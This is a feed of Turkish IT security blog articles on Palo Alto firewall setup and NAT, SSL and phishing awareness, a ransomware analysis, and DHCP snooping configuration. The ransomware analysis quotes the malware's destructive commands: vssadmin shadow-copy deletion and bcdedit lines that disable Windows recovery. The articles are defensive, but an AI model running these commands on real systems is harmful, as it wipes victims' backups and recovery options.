Quantcast
Channel: Güvenlik
Viewing all 105 articles
Browse latest View live

Palo Alto 500 Firewall Cihaz Erişimi

$
0
0

Merhaba, bu makalemde sizlere sahip olduğunuz bir palo alt firewall cihazına nasıl bağlanacağınızı göstereceğim. Cihazımıza seri/console port, SSH ve Web GUI üzerinden bağlanabiliriz. Seri kablomuz mevcut ise default IP'yi kendi networkümüzdeki bir IP ile değiştirerek gerek SSH gerekse Web Arayüzünden erişimi rahatlıkla sağlayabiliriz. Eğer seri kablonuz yok ise cihazın management portuna ethernet kablosunu takıp diğer ucunu kendi bilgisayarımıza taktıktan sonra LAN ayarlarını cihazın default IP networküne uygun konfigüre edersek 192.168.1.1 Ip adresi ile Web arayüzüne veya SSH ile bağlantı kurabiliriz.

Varsayılan cihaz ip adresi: 192.168.1.1

User name: admin

Password: admin

Cihazın ilk Network Ayarları nasıl yapılır?

Yukarıda anlatıldığı şekilde cihaza erişimi tamamladıktan sonra:

CLI ile örnekteki gibi konfigüre edebilirsiniz:

admin@PA-500> configure

admin@PA-500# set deviceconfig system ip-address 10.30.11.1 netmask 255.255.255.0 default-gateway 10.30.11.254 dns-setting servers primary 172.16.20.230

admin@PA-500# commit

Web Araüyüzü yoluyla :

Device > Setup > Management Interface Settings yolunu izleyip cihazımızın ilk network ayarlarını resimde görüldüğü gibi düzenleyebiliriz.

clip_image002

Default Admin Şifresi Değiştirme Nasıl Yapılır?

Default kullanıcı adı “admin” olduğundan bu kullanıcı adına sahip şifreyi değiştirebilir veya yeni adminler oluşturabiliriz. İzlememiz gereken yol şu şekilde olmalı:

Device > Administrator >admin tıkladığımızda karşımıza aşağıdaki ekran gelecektir:

clip_image004

Burdan eski şifreyi (admin) yenisi ile değiştirdikten sonra sağ üst köşede bulunan ( clip_image006  )butonu ile değişiklikleri uygulayıp, Logout olup tekrar giriş yaparken yeni şifremizi kullanabiliriz.

CLI ile aşağıdaki şekilde şifremizi değiştirebiliriz:

admin@PA-VM> configure

admin@PA-VM# set mgt-config users admin password

Enter password:

Confirm password:

[edit]                                                                         

admin@PA-VM# commit

..99%.....100%

Configuration committed successfully

Zaman (Time) ve Time Zone Ayarları Nasıl Yapılır?

CLI ile:

admin@PA-VM# set deviceconfig system timezone Asia/Istanbul

admin@PA-VM#exit

admin@PA-VM>set clock date  2015/05/22 time 12:10:43

admin@PA-VM>configure

admin@PA-VM# commit

Web Arayüzü ile:

Device > General Settings >clip_image008

clip_image010

Unutulan Admin Parolası Nasıl Sıfırlanır?

Seri kablo ile cihazın console portuna bağlanıp cihazı açıyoruz bağlantı değerlerimiz (9600,8,n,1)

Boot işlemi sırasında ekranın görüntüsü resimdeki gibi olacaktır:

clip_image012

Maint komutunu girip maintanence modu başlatıyoruz :

clip_image014

Maintanence mode’a girerken ekran resimdeki gibi görünür :

clip_image016

Continue deyip devam edince karşımıza çıkan ekranda “Running Config’i seçiyoruz”

clip_image018

Parolasını hatırladığımız bir config var ise onunla boot işlemini yapıyoruz. Eğer bu işlem başarısız oluyorsa Factory Reset yapılmalıdır.

Factory Reset Nasıl Yapılır?

 Seri Kablo ile bağlanıp Maintenance mode’a giriş yapıyoruz.

Maintenanca mode ekranında “Factory Reset” kısmını seçiyoruz:

clip_image020

 

Gelen ekranda tekrar Factory Reset’i seçip Enter’a basıyoruz:

clip_image022

Packet Capture Nasıl Yapılır?

Packet Capture özelliği ile cihazımızın herhangi bir bacağına gelen ve cihazımızdan çıkan paketleri sniff edebilir inceleyebiliriz. Palo Alto Firewall bize bunu Packet Capturing özelliği altında sunuyor.

Cihazımız üzerinde Packet Capture özelliğinin ayarlarını yapmak için şu yolları izliyoruz:

 Monitor > Packet Capture

Configure Filtering > Manage Filters sekmesini tıklıyoruz

clip_image023

Maksimum 4 filtre ekleyeceğimiz bu ekranda örnek olarak bazı değerler girdim. Ingress Interface diye bizden istenen cihazımızın hangi bacağından çıkan dataları filtrelemek istiyoruz?

Source ile özel bir IP girebiliyoruz. Destination ile hedef IP’yi belirtiyoruz. Örnekteki konfigurasyon şu anlama geliyor:

Benim 1/3 bacağımdan çıkıp 192.168.13.41 IP’sine 443 portu ile ulaşan paketleri filtrele. Burda mantıksal ‘AND’ işlemi uygulandığını da belirtmekte fayda var.

 

Stage>Add sekmesini tıklıyoruz. Bu seçenek ile neyi capture etmek istediğimizi belirtiyoruz.

Receive : Cihazın dataplane’ine gelen paketler

Firewall : Receive paketinden sonra kurulan ilk session’dan başlar içeride gerçekleşen fonksiyonlar, kurallar, IPSEC paketleri..vb. ile alakalı olayları paketler

Transmit : Firewall evresinden (stage) sonra source’dan dönen paketleri yakalar.

Drop : Drop edilen (hata mesajı ile dönen) paketleri yakalar.

Terimlerimizi öğrendikten sonra stage nasıl eklenir görelim. Receive, Firewall, Transmit veya Drop hangi evreyi seçmek istiyorsak hepsi için ayrı ayrı ekleme işlemi yapıyoruz

clip_image025

Bu işlemlerin ardından stage bölmesi resimdeki gibi görünür:

clip_image027

Bu işlemler tamamlandıktan sonra Configure Capturing seçeneğinde bulunan Packet Capture switchini ON konumuna getiriyoruz ve packet capture işlemi başlıyor.

clip_image029

Capture edilen  .pcap uzantılı dosyaları resimde görünen “captured files” kısmından indirebilir.

clip_image031

CLI komutlarıyla packet Capture işlemi de şu şekilde yapılır:

Filter oluşturma:

debug dataplane packet-diag set filter match source <IP adresi> destination <IP adresi>

debug dataplane packet-diag set filter on

debug dataplane packet-diag show setting

 

Stage(evre)leri tanımlama ve isim verme:

debug dataplane packet-diag set capture stage transmit file <vereceğiniz isim (Tx gibi)>

debug dataplane packet-diag set capture stage receive file <vereceğiniz isim (Rx gibi)>

debug dataplane packet-diag set capture stage firewall file <vereceğiniz isim

(Fw gibi)>

debug dataplane packet-diag set capture stage drop file <vereceğiniz isim (drop gibi)>

Capture işlemini başlat:

debug dataplane packet-diag set capture on

 

Config Yedeği Nasıl Alınır?

Cihazımızın üzerinde çalışırken yaptığımız bir konfigürasyonun yedeğini almak ve gerektiği zaman onu tekrar yüklemek isteyebiliriz. Bu konfigürasyonu export edip başka bir cihazda da kullanmak isteyebiliriz. Gelin nasıl yapılıyor sıralayarak görelim:

Device > Setup > Operations sekmelerine tıklayalım. Karşımıza çıkan ekran resimdeki gibi olacaktır. Yedeğini almak istediğimiz config dosyasına “Load Named Configuration Snapshot” kısmına tıklayarak bir isim verip OK diyoruz.

clip_image033 

Yedeğini aldığımız config dosyasına daha sonra tekrar dönmek istiyorsak “Load Named Configuration Snapshot” kısmından ismini verdiğimiz config dosyasını seçip OK diyoruz.

clip_image035

Export ve import işlemlerini de aynı menüden yine aynı yolları izleyerek yapabilirsiniz.

clip_image037

Makalemin sonuna geldik, umarım faydalı bir makale olmuştur. Bir sonraki makalemde görüşmek üzere


Palo Alto Firewall NAT Kavramı ve Konfigürasyonu

$
0
0

Bu makalemde sizlere Palo Alto Firewall ürünü üzerinde NAT kavramı ve NAT konfigürasyonu konusunu anlatacağım. Palo Alto işletim sistemi Source IP/Port ve Destination IP/Port olmak üzere her iki translate işlemini de yapabilir. Bu işlemi yapmak için bazı kurallar kullanır. 

Bu kurallar;

Source (kaynak) ve Destination (hedef) zone

Destination Interface ( isteğe bağlı)

Source ve Destination Adres

Servis

kullanılarak dizayn edilir. Birden fazla NAT kuralı yazılabilir ve bu kurallar yukarıdan aşağıya doğru değerlendirilir. Yukarıdan aşağı doğru gelirken  paket herhangi bir NAT kuralı ile eşleşirse diğer tüm kurallar ignore edilir. Bundan dolayı özel bir NAT kuralımız varsa en başa koyarız.

clip_image002

Source NAT

Örnekler üzerinden anlatacağım birkaç case olacak. Topolojimiz aşağıda görüldüğü gibidir.

clip_image004

192.168.1.0/24 subnetindeen gelen büm trafik dış interface’imiz olan E1/1’in IP adresine yani 1.1.1.1/24 subnetinteki adreslere çevriliyor.

Önce NAT kuralımıza bir isim veriyoruz. Source Zone olarak trust olarak isim verdiğimiz iç networkümüzde bulunan zone’u seçiyoruz. Destination Zone bizim untrust dediğimiz dış dünyaya çıkacak alanımız oluyor bunu seçiyoruz. Özellikle seçilmek istenen bir source adress varsa seçiyoruz. Daha sonra Source Translation kısmında dynamic-ip-and-port seçilip, adres tipi interface adres, intereface : dış interface IP tipi IP olarak seçiliyor.

clip_image006

NAT kuralının çalışıp çalışmadığını anlamak için, “show session all” komutunu CLI ekranında çalıştırırsak bize var olan session bilgilerini getirecektir.

admin@PA-5060> show session all

--------------------------------------------------------------------------------

ID Application State Type Flag Src[Sport]/Zone/Proto (translated IP[Port])

Vsys Dst[Dport]/Zone (translated IP[Port])

--------------------------------------------------------------------------------

2359304 ssh ACTIVE FLOW NS 192.168.1.250[59534]/trust-l3/6 (1.1.1.1[50219])

vsys1 1.1.1.10[22]/untrust-l3 (1.1.1.10[22])

2359303 ssh ACTIVE FLOW NS 192.168.1.100[50034]/trust-l3/6 (1.1.1.1[51650])

vsys1 1.1.1.10[22]/untrust-l3 (1.1.1.10[22])

admin@PA-5060>

Herhangi bir session’’un detaylı bilgisini de görmek istersek “ show session id 2359304 komutunu kullanabiliriz.

admin@PA-5060> show session id 2359304

Session 2359304

c2s flow:

source: 192.168.1.250 [trust-l3]

dst: 1.1.1.10

proto: 6

sport: 59534 dport: 22

state: ACTIVE type: FLOW

src user: unknown

dst user: unknown

s2c flow:

source: 1.1.1.10 [untrust-l3]

dst: 1.1.1.1

proto: 6

sport: 22 dport: 50219

state: ACTIVE type: FLOW

src user: unknown

dst user: unknown

start time : Fri Apr 8 10:26:33 2011

timeout : 432000 sec

time to live : 431845 sec

total byte count : 5686

ÖRNEK 2 HERHANGİ BİR ADRESİ NAT TRANSLATİON İÇİN KULLANMAK

clip_image008

Burda Source translation olarak dynamic-ip-and-port seçtikten sonra Adres tipini Translated Adress olarak seçip daha önce oluşturduğumuz bir adres objesini translated adres olarak seçiyoruz.

clip_image010

ÖRNEK 3 SOURCA NAT IP ADRESS TRANSLATİON

clip_image012

 

Sadece Source IP adreslerimizi NAT işlemine tabi tutarken Source Translation kısmında dynamic-ip kısmını seçip daha önce belirlediğimiz bir IP havuzunu Translated Address olarak belirliyoruz.

clip_image014

Destination NAT

Destinatio NAT hedef ip adreslerini ve portlarını translate etmek için kullanılır. Aynı zamanda tek bir IP adresini birden fazla iç IP adresine çevirmek için de kullanılır. Destination Port numaraları da destination host’ları tanımlamak için kullanılır.

Bu örnekte daha önce bazı testler yapmak iiçin kullandığım NAT kuralını ve politikasını sizlerle paylaşacağım.

Sms Kimlik doğrulama sistemi için yaptığımız testi kısaca şöyle açıklayacağım. Palo Alto Firewall üzerinde kimlik doğrulama profili olarak bir sms authentication ürününü seçtik. Dışarıdan bir IP’ye bu testi gerçekleştirmesi için NAT kuralı ve NAT politikası yazılması gerekir.

clip_image016

NAT kuralımızın adını verip, Source Zone olarak WAN zone’umuzu seçiyoruz. Desstination Zone olarak da WAN alanımızı seçiyoruz ( istekler dış bacağa geldiği için).Destination adres olarak WAN bacağımıza yani isteklerin dışarıdan gelirken karşılaşacağı ilk bacağıın IP adresini yazıyoruz.  Eğer özel bir servis grubunuz varsa servis grup olarak ekleyip burda servis kısmına girebilirsiniz. Buraya kadar orijinal paket için konfigürasyonumuzdu. Translated paket için ise Destination Adress Translation kısmından translated adresi içerideki radius server IP adresini yani sms authentication yazılımının kurulu olduğu server’ın ip adresini veriyoruz.

Gelelim bu NAT kuralı için politika (poicy) yazmaya:

clip_image018

Policy ismini verdikten sonra dışarıdan şu IP adresinden gelip şu Zone’ume ulaşmaya çalışan kullanıcıya izin ver işlemini resimde görüldüğü gibi uyguluyoruz.

Destination IP & Port Translation

Bazı durumlarda Hep IP hem de Port translation gerekebilir. Aşağıdaki örnek PAN resmi sayfasından alınarak hazırlanmıştır

Topoloji :

clip_image020

clip_image022

NAT Kuralı

clip_image024

Dışarıdan untrust Zone’uma gelip serverlarıma 80 portuyla erişen kullanıcının I P adresini ve Portunu translate et.

Security Kuralı

clip_image026

Dışarıdan DMZ alanıma web uygulamasını kullanarak gelenlere izin ver.

Yaptıklarımızın çalışıp çalışmadığını doğrulamak için yine aşağıdaki komutu kullanabiliriz.

 

admin@PA-2050> show session all

--------------------------------------------------------------------------------

ID Application State Type Flag Src[Sport]/Zone/Proto (translated IP[Port])

Vsys Dst[Dport]/Zone (translated IP[Port])

--------------------------------------------------------------------------------

80 web-browsing ACTIVE FLOW ND 1.1.1.250[55077]/untrust-l3/6 (1.1.1.250[55077])

vsys1 1.1.1.100[80]/dmz-l3 (10.1.1.100[8080])

 

Yüzeysel de olsa anlatmaya çalıştığım bu konu umarım sizin açınızdan faydalı olmuştur. Bir başka makalede görüşmek ümidi ile...

 

SSL Sertifikaları ve Oltalama (Phishing)

$
0
0

Yakın zamanda Obama’nın özellikle tüm Amerikan devlet kurum web sitelerinin SSL kullanmasını önermesi üzerine, sadece Amerika’da değil diğer birçok ülkede de kamu web sitelerinde SSL kullanılması için harekete geçildiğini görüyoruz. Aslında burada amaç tabii ki bilgi güvenliğini sağlamak ve SSL sertifikasının esas görevi olan kullanıcı-sunucu arasında akan önemli bilgilerin çalınmasını engellemek gibi görünse de bilgi korsanlarının Oltalama (Phishing) tekniğini kamu sitelerinde kullanmasını engellemektir. Keza devlet kurumundan gelmiş gibi görünen bir e-maile itimat etme ihtimalimiz hepimiz için çok yüksek. Böylece HTTPS olarak görünmeyen hiçbir kamu web sitesine itimat edilmemesi üzerinde gerekli bilgilendirmeler kamuoyuna zaten yakın zamanda yapılacaktır.

clip_image002

Son birkaç senedir yoğunca kullanılmaya başlanılan bu metodu bilmeyenler için bir kez daha yineleyecek olursak; Yemleme metodunu kullanan bilgi korsanları size atmış olduğu e-postayı bir bankadan veya büyük bir kurumdan gelmişçesine göstererek, sizi kullandığı sahte ama gerçeğine çok benzer bir link ve web sayfasıyla kandırarak sizden kişisel veya finansal bilgilerinizi alabilmektedir.

Birkaç Oltalama örneğiyle konuyu pekiştirelim;

Hedef kişiye temas halinde olduğu veya tanıdığı kişi, kurum veya kuruluşlardan gönderiliyormuş izlenimi verilen sahte bir e-mail gönderilir. Şifresinin süresinin dolduğu ve yenilenmesi gerektiği söylenerek kendi sahte sitelerine link verirler. Tıkladığında; daha önceden hazırlanan ve tanıdık kuruluşa ait site ile aynı görünümde olan bu sahte siteye girilen her bilgi ellerine geçer.
Genelde ilgili kuruluşun web site adresine yakın adreslerin seçiliyor olması da anlaşılmasını zorlaştırıyor. “microsoft.com” yerine “microfost.com” veya “microsot.com” adresini kullanabildikleri gibi alt alan adlarını kullanarak, “microsoft.abcd.com” gibi, web adresleri konusunda bilgili olmayan kullanıcıların veya dikkatsiz kullanıcıların hemen güvenebileceği adresleri seçiyorlar.

Servis sağlayıcı firmalardan (TTNet, Turkcell vb.) gelmiş gibi görünen ve yüklü miktarda fatura bilgilerine ekteki doküman sayesinde ulaşabileceğinizi söyleyen e-mailler ile hala başarılı oranlarda oltalama yapılabilmektedir. Son zamanlarda çok sık rastladığımız en etkili ve zaralı bu tür saldırılar güncel olarak “Cryptolocker” atağı olarak nitelendirilmektedir.

 

 

clip_image004

 

Bankalardan gönderilmiş gibi görünen ve kullanıcılara banka şifrelerini değiştirmelerini öneren e-postalar yine oltalama amaçlı kullanılabiliyor. ‘Güvenlik sorunlarını’ gerekçe gösteren bu e-postalar kullanıcıyı önce sahte bir link ile bankanın taklit sitesine yönlendiriyor, daha sonra da kullanıcıdan şifresini değiştirmesini istiyor. Kullanıcı güvenlik nedeniyle şifresini değiştirdiğini sanırken, bilgi korsanları hala geçerli olan eski şifreyi ele geçirmiş oluyor.

 

clip_image006

Oltalama metodunu anlamak ve hatta güvenli bir şekilde herhangi bir siteyi ziyaret etmek için dikkat edilmesi gereken birkaç hususun üzerinde duralım;

 

E-posta göndericisi; ilk yapılması gereken e-postanın size kimden geldiğini kontrol etmeniz. Eğer e-postanın büyük bir kurumdan gönderildiği söyleniyor ise bu e-postada mutlaka kurumun alan adını taşıyan bir kullanıcı veya servisinden gelmiş olmalıdır.

E-posta hitap şekli; Bilgilerinizin bulunduğu herhangi bir kurum size hitap ederek e-posta atar. Bu yüzden e-postanın başında size adınızla hitap edilmemiş ise, genellikle bu e-posta içerisindeki linklere tıklamamanız önerilir.

Eğer kullandığınız tarayıcıda SSL kilidi ni görmüyorsanız, bu site kesinlikle SSL sertifikası kullanmıyor demektir. Şu anda her banka ve e-ticaret sitesi mutlaka SSL sertifikası kullanmakta olup (ödeme bilgilerinin paylaşıldığı internetteki her platform kanun gereği SSL kullanmak zorunda), kullanmayan sitelere itibar etmemeniz tavsiye edilmektedir.

Alan adı isim uyuşmazlığı; tarayıcınızda yazan ve ziyaret ettiğiniz sitenin sunucu adı olarak kullanılan ismi iyice analiz edin. Bunu özellikle bankalar, e-ticaret siteleri ve bilgi paylaşacağınız her site için mutlaka yapın. Özellikle tanınır markalara yakın isimler seçilmekte ve bazen de alt alan adı olarak sunucu adına yazılmaktadır. Örneğin “garanti.ödeme.com” adresinin garanti bankasıyla hiçbir alakası olmayıp bu adres ödeme.com adlı alan adının sahibi tarafından kontrol edilmektedir.

Antivirus yazılımınızın daima çalışır ve güncel durumda olduğunu kontrol ediniz.

Güvenilmeyen sertifika uyarısı; tarayıcınız eğer güvenilmez sertifika uyarısı veriyorsa burada kaynağı belli olmayan bir SSL sertifikası kullanılmakta olup güvenilmemesi gerekir. Burada ayrıyeten önemli bir noktayı açıklamak yerinde olacak; keza son zamanlarda Chrome tarayıcısında görülen ve sertifikanın geçersiz olduğu ibaresini taşıyan çarpı işareti aslen SSL sertifikasının SHA1 algoritmasıyla üretildiğine ve artık SSL sertifikalarının SHA2 algoritmasıyla üretilmesi gerekliliğini ifade eden bir uyarı mesajıdır. Diğer her sertifika üreticisi gibi, TÜRKTRUST olarak bizde, SHA1 algoritmasıyla ürettiğimiz ve hala aktif olan SSL sertifikalarımızı yenileriyle değiştirmekteyiz

 

 

clip_image008

 

Uluslararası SSL Standartlarına yön veren organizasyonlar tarafından da tartışıldığı üzere yakın zaman içerisinde bilgi paylaşımı yapılan her web sitesinin SSL sertifikası ile donatılması zorunluluğu söz konusu olacaktır.

 

clip_image010

 

Ayrıca belirtmek gerekir ki; Google, artık aramalarda SSL sertifikası kullanan sayfaları daha üst seviyelerde göstermektedir. Yani yakın zamanda SSL sertifikaları bir tercihten ziyade güvenli bilgi akışı olan her internet bağlantısında kullanılacak gibi görünüyor.

 

TeslaCrypt – Cryptowall – Cryptolocker Analiz ve Korunma

$
0
0

Ransomware, yani dosyalarınızı şifreleyerek sizden yüklü miktarda para talep eden kötü niyetli fidye yazılımları. ( Cryptolocker, Cryptowall, TeslaCrypt, AxCrypt ve daha nicesi )
Ben bunu virüs değil, fidye yazılımı olarak tanımlıyorum. Zira bu yazılımlar cihazlarınızın çalışma prensibine zarar vermiyor.  Herhangi bir veri trafiği, ya da istemci/sunucu mantığı ile çalışan herhangi bir arka kapı da bırakmıyor.
Yaptığı iş özetle, yazılım çalıştırıldığında
AES-256 standardı kullanılarak dosyalarınız şifrelenir ve dosyalarınızı şifreleyen şifre ayrıca şifrelenerek uzak bir veritabanına gönderilir.

Belki başlangıçta AES-256 standardından bahsetmek gerekir.
AES-256 uluslararası alanda şifreleme standardı olarak kabul edilen bir şifreleme algoritmasıdır ve bu algoritma değiştirme-karıştırma temeline dayanır.
256 bit uzunluğunda şifrelemeye olanak verir.


clip_image002


Yukarıda anahtar uzunluğu ile bu anahtarların kaç adet formülasyon barındırabileceğinin tablosu bulunmaktadır.

Buradan hareketle;
TeslaCrypt – Cryptowall – Cryptolocker  Yazılımlarının Yetenekleri :
+ Cihazınız üzerinde çalışan özel servisleri durdurabilir ( yönetici yetkisi varsa )

wscsvcWinDefendwuauservBITSERSvcWerSvc

+ Geri yükleme noktalarınızı ve gölge kopyalarınızı silebilir. ( yönetici yetkisi varsa)
• vssadmin.exe Delete Shadows /All /Quiet
+ Ağ sürücüsü olarak tanımlanan disklerdeki verileri şifreleyebilir.
+ Windows hata kurtarma ekranlarını deaktif hale getirebilir.

bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures

Yapamadıkları :
+ Yazılım tekrar başlatılmadığı sürece, sadece 1 kez çalışır.
+ Kendisini kopyalama ve ağdaki diğer cihazlara bulaşma özelliği bulunmamaktadır.

Bulaşma Yöntemleri :
Genel olarak oltalama (phishing) olarak adlandırdığımız yöntemlerle bulaştığı görülür.
Sosyal mühendislik yöntemleri ile mail ile bir e-fatura gibi ya da bir kargo bildirimi gibi gelebilir.
Buna karşın son zamanlarda web ortamından da bulaştığı görülmektedir. Ayrıca, zombi bilgisayar olarak bildiğimiz  ve hergün iletişimde olduğunuz kişi ve kurumlardan da gelebilir.



Mail ile gelen iki oltalama örneği :

clip_image004

clip_image006



Eğer yukarıdaki gibi bir mail ile gelen linke tıklayıp yazılımı indirilip çalıştırılırsa şifreleme işlemi başlatılır ve dosyalar AES-256 standardına göre şifrelenmeye devam eder.
Şifreleme sürerken fark edip sistemin kapatılması halinde işlem durur ve yeniden başladığında şifreleme kaldığı yerden devam etmez.

Şifreleme işlemi tamamlandığında aşağıdaki ekran görüntüleri verilmiş notlar bırakılır.
( ŞİFRE_ÇÖZME_TALİMATI , HELP_DECRYPT, RECOVERY_INSRUCTİON gibi)

clip_image008

clip_image010

clip_image012


Bahsetiğimiz yazılımların farklı varyantlarında daha talimatlar ve daha farklı talimat ekran görüntüleri bulunmaktadır.

 

Hedeflenen dosya uzantıları şöyledir :
clip_image014

Şifrelemenin incelenmesi :
Şifreleme başladığında öncelikle cihazı kimliklendirmek için makine hakkında bilgi toplanır.
İşlemcisi, ram’i vs…

Cihaz bilgisinin HASH hali :

clip_image016


Malware öncelikle daha önce sisteme enjekte olmuş bir yazılım var mı diye kontrol eder, eğer sisteme enjekte olmuş bir yazılım yok ise,
explorer.exe örneği oluşturarak kendini enjekte etmeye başlar. Malware ayrıca svchost örneği de oluşturur.
Daha sonra şifrelenmiş şifre, Command and Control Server ‘a kurbanın id/password ve public key bilgisiyle gönderilir.
C&C Sunucu ( uzak sunucu ) ile istemci arasındaki tüm veri trafiği encrypted olarak gider ve gelir.
clip_image018
Yazılım ;
%Temp%
C:\<random>\<random>.exe
%AppData%
%LocalAppData%
%ProgramData%
Altından çalışır ve aşağıdaki  registry düzenlemelerini yapar;

HKCU\Software\<unique computer id>\<random id>
HKCL\software\Microsoft\Windows\Currentversion\Run
clip_image020


Korunma Yolları :
Bu ve bunun gibi yazılımlarla mücadele etmek, öncelikle kullanıcıyı bilinçlendirmekten geçtiği düşünülse de, eğer iş kullanıcıya bırakılırsa yazılımı sadece merakından dolayı dahi çalıştıracağı açık.
O halde;
Sistemi yöneticileri bu yazılımları kullanıcıya ulaşmadan engellemelidirler.

Öncelikle suyu kaynağında kurutmak gerekli;
+ Mail sistemlerini korumak
+ İnternet erişimini korumak
+ Sunucu servislerini korumak
+ Kullanıcı cihazlarını korumak



1- Mailler temiz ip ve temiz domainlerden geldiği için mail sisteminin bulunduğu altyapı önemlidir. Bu anlamda , Office 365 önerimdir.
İlgili bilgi :
http://www.cozumpark.com/forums/thread/472471.aspx
2- İnternetten dosya indirmeyi denetleyebilirsiniz ( exe yasaklama, zip yasaklama gibi)
3- Sunucuların kesinlikle dış ip’si ile RDP bağlantısına açılmaması gerekir. ERP veya muhasebe yazılımlarının bulunduğu klasör ile veritabanı klasörü mümkünse ayrılmalıdır ve gerekirse bu tarz uygulamaların veritabanı klasörlerine kullanıcı erişimleri sınırlandırılmalıdır.Ayrıca Ağ Sürücüsü olarak değil de, dosya sunucularınızdaki klasörler “kısayol” olarak tanımlanmalıdır.
4- İstemci tarafında şifrelemeyi durduran yazılımlar kullanılmalıdır.
CryptoMonitor
CryptoPrevent
gibi…



Ayrıca, GPO ile zararlı yazılımın çalıştığı klasörlerin uygulama çalıştırma izinleri yasaklanmalıdır.
Software Restriction Policy  :
http://www.cozumpark.com/blogs/windows_server/archive/2008/04/28/software-restriction-policy.aspx



Yasaklanması gereken yollar ( path rule ):

clip_image022

Umarım faydalı bir makale olmuştur.

 

DHCP Snooping ve Yapılandırma Adımları

$
0
0

Bu yazımızda en çok kullandığımız protokollerden biri olan DHCP (Dynamic Host Configuration Protocol) protokolünün güvenliği hakkında neler yapabilirizi konuşuyor olacağız. Başlamadan önce  DHCP protokolü yapısı ve işleyişi hakkında bilgi edinmek isteyen arkadaşlar bu linkten faydalanabilir. Bu protokolün bizim işimizi ne kadar kolaylaştırdığı tartışılmaz bir gerçektir. Bu kolaylıkdan faydalanırken bu protokolü kendilerine bir saldırı aracı olarak kullanabilen saldırganlar için de gerekli 2. katman güvenlik önlemlerini almamız gerekmektedir.

Peki, bu protokol nasıl bir tehdit haline geliyor? Bize ne gibi zararlar verebileceği konularından bahsedecek olursak. Man in the middleve Denial of Service  olmak üzere genellikle iki tip saldırı türüyle karşı karşıya kalabiliyoruz. Peki bu saldırılar nasıl gelişmekte ve bize ne gibi zararları dokunmakta?

Öncelikle en zararlısı olan Man in the middle ile başlıyalım. Saldırgan yapımızda Dhcp sunucumuzdan istekde bulunan bir makinaya DHCP Offer paketi ile yanıt vererek kullanıcıya gönderdiği ağ bilgilerinin içerisindeki gateway kısmına kendisinin ip adresini yazarak gönderiyor. Kullanıcı tamam bu bilgiler uygundur diyerek DHCP request döner. Son olarak DHCP acknowledgement ile saldırganın istediği şekilde işlemler tamamlanır. Artık kullanıcımızın gateway’i saldırgandır. Bu andan itibaren kullanıcımız saldırganın hazırladığı fake bir siteye yönlendirilebilir ve trafiği istenilen şekilde kullanılabilir. Bu saldırı gerçekten profesyonel kişilerin yapmasıyla büyük zararlara yol açan bir saldırı türüdür.

Diğer saldırımız ise bir Denial of Service saldırısıdır. Bu saldırının kayıpları man in the middle gibi büyük ölçüde değildir. İsminden de anlaşıldığı üzre DHCP servisini engelleme ve hizmet veremiyecek hale getirmeye çalışılan bir saldırı türüdür. Hiç teknik bilgisi olmayan bir kişi bile internette bulabileceği birçok programcık ile bu işi yapabilir. Bu programlar sürekli DHCP Discover mesajı yayınlayarak ip talebinde bulunuyor. DHCP sunucumuzda bu taleplere cevap vermesi karşısında belli bir süre sonra ip havuzunu doldurarak hizmet veremez hale geliyor. Aşağıdaki ekran görüntüsü bu saldırının yapılabildiği bir programdan alınmıştır. Bu saldırı türü gördüğünüz gibi pek tecrübe isteyen bir saldırı türü değildir.

clip_image002

 

Bu saldırı türlerinin 802.1x Authentication, Port Security, DHCP Snooping ve IP Source Guard  gibi yapılandırmalar ile önüne geçebiliriz. Bu yapılardan Port SecurityÇözümpark portalımızda mevcut, bu satırları okuyorsanız artık DHCP Snooping yapılandırması da mevcut olmuş bulunuyor. J Geriye kalan konulara da bir başka makalede değiniriz inşallah.

Şimdi yapılabilecek saldırılar ve korunma yöntemleri hakkında bir ön bilgi verdiğimize göre bu saldırılardan korunma yöntemlerinden biri ve makalemizin de konusu olan DHCP snooping’in çalışma mantığı ve yapılandırmasına geçebiliriz.

clip_image004

DHCP Snooping yapılandırmasında switch’imize yapımızdaki DHCP sunucuların hangi interface arkasında olduğunu söylüyoruz. Switch üzerinde bu portları trust yapıyoruz. Cihazımız bu portlar üzerinden DHCP Offer paketi gönderimine izin veriyor. DHCP sunucusu olmayan portlarımızı da untrust (default olarak tüm portlar untrust’dır.) olarak ayarlıyoruz. Böylelikle untrust bir port üzerinden gelen DHCP Offer paketi yukarıdaki resimde de görüldüğü gibi switch üzerinden geçemiyor. Bununla man in the middle tarzı saldırıya karşı bir koruma gerçekleştirmiş oluyoruz. Denial of Service saldırıları için ise saniyede interfacelerden geçebilecek maximum DHCP paket sayısını belirleme ve eş zamanlı bağlanan maximum cihaz sayısı gibi değerleri belirterek. Bu belirlemeleri aşan interfaceler kapatılır veya bir sınırlama getirilerek önüne geçebiliriz.

clip_image006

Yukarıdaki gibi basit bir yapımız var tüm kullanıcılar default vlan olan vlan 1’de  DHCP sunucumuz 192.168.1.0/24 bloğunda ve 192.168.1.10 ip adresinden ip dağıtmaya başlıyacak şekilde yapılandırdık. Kullanıcılarımız aşağıdaki gibi DHCP’den ip alabilir durumda. User_1 ve User_2 isimli iki kullanıcımız mevcut. Kabloların bağlı olduğu interface’lerde resmimizde göründüğü gibidir. Bu çalışmayı Cisco packet tracer programı ile gerçekleştiriyor olacağız. Hazır olduğumuza göre yapılandırmaya başlayabiliriz.

clip_image008

 

Öncelikle global config modunda DHCP snooping özelliğini etkinleştiriyoruz.

clip_image010

Şimdi hangi interface’den,  hangi ip adresi alınmış, mac adresi, vlan bilgisi ve kira süreleri gibi verilerin tutulacağı bir veritabanı’na ihtiyacımız olacak. Bunu switch üzerinde oluşturabileceğimiz gibi TFTP protokolü ile okuma, yazma yetkisi olan bir klasörede aktarabiliriz. Biz switch’imizin flash’ı üzerinde bir veritabanı oluşturarak devam edeceğiz.

clip_image012

Veritabanımızı belirttikden sonra yapımızdaki vlanlar üzerinde yapılandırmaya devam ediyoruz. Yapımızda yukarıda da belirttiğimiz gibi Vlan 1 vardı sadece,

clip_image014

Yukarıdaki komutumuzla Vlan 1 üzerinde yapılandırmamızı aktif etmiş oluyoruz. Şuan bütün interface’ler default olarak untrust durumdadır. Bu sebeble DHCP sunucumuzun ip dağıtamadığını kullanıcılarımızdan birini statik duruma çekip tekrar DHCP seçeneğini seçtiğimizde aşağıdaki gibi görebiliyoruz.

clip_image016

 

Şimdi DHCP sunucumuzun bulunduğu interface’e güvendiğimizi belirterek devam edeceğiz.

clip_image018

Yukarıdaki yapılandırmadan sonra kullanıcılarımız ip durumlarını kontrol edecek olursak.

clip_image020

 

